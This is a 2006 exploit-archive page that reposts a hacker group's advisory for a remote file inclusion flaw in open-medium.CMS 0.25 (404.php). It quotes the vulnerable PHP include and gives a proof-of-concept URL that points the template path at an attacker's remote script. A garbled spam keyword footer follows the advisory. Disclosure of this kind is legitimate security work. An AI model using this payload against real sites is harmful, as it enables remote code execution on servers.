about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability




2006-05-25 open-medium.CMS <= 0.25 (404.php) Remote File Include Vulnerability 
Rated as : High Risk

################ DEVIL TEAM THE BEST POLISH TEAM #################
#open-medium (0.25) - Content Management System - Remote File Include
Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
##################################################################
[code]
404.php:

.......

} else {
// templates verwenden
if
(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
{
include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
}
}

?>

[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]


###################################################################
#Elo ;-)


securitydot.net - 2006-05-25

Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 21:50:24 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
video of s look.soume photoalb 200 /compo 200 /compo lo607l PHP+Advanc diansex.co HTTP/1.1 auth.cooki www.song2p animals*** bangbug lo419l HTTP_NR_SS m...ion%25 www.mmo369 9ahn.cn dragon bal Sex 89.Com Que precio www.sex ar p...ons/te Moco space livesexweb news for c dost yabi vedeo sex 89 com pinoysacnd livese www.anita. acrob cum Invision P pogo internet e lo593l www.websit www.youtou Karina hot news for c 268yun2.co www.thetop MKPortal M livefuckin Www.blackg 53wo.com www.bigboo -kill